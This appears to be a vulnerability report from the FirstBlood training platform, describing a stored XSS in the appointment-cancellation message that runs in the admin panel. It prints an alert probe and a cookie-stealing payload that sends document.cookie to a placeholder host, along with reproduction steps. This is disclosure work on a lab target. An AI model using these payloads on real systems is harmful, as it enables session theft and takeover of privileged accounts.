FirstBlood-#865Stored XSS on Cancel Appointment Message.
This issue was discovered on FirstBlood v2

On 2021-10-29, th4nu0x0 Level 2 reported:

Summary:

  • When a user cancels an appointment by adding a message with the request the message can be read by admin on /drpanel/cancelled.php . Since there is no protection/filter present we can send a malicious javascript (XSS Payload) on the message which is then being executed on the admin panel.
  • Since the cookies are not set to HTTPonly I was able to capture the cookie's remotely when admin visits the /cancelled.php.

Payload

  • Simple Alert: test"><img%20src=x%20onerror=alert(document.domain)>

  • Cookie Stealing: tes"></a><img%20src=x%20onerror=this.src='https://your.site?c='%2bdocument.cookie>

Steps To Reproduce:

  • Create appointment and copy the ID

  • On appointment management page enter the id.

  • Click Cancel Appointment and capture the request

  • On body add message parameter and set it to test"><img%20src=x%20onerror=alert(document.domain)> and forward the request

  • Now using your admin account visit https://firstbloodhackers.com/drpanel/cancelled.php

Impact:

Account takeover of higher privilege users ( Admin, Doctors)

P2 High

Endpoint: /drpanel/cancelled.php

Parameter: message

Payload: test"><img%20src=x%20onerror=alert(document.domain)>

FirstBlood ID: 22
Vulnerability Type: Stored XSS

Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues such as when creating and editing and not just when cancelling the appointment. Making use of htmlentities() and relying on .value() in javascript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also results in it being vulnerable to admins on cancelled appointments as well.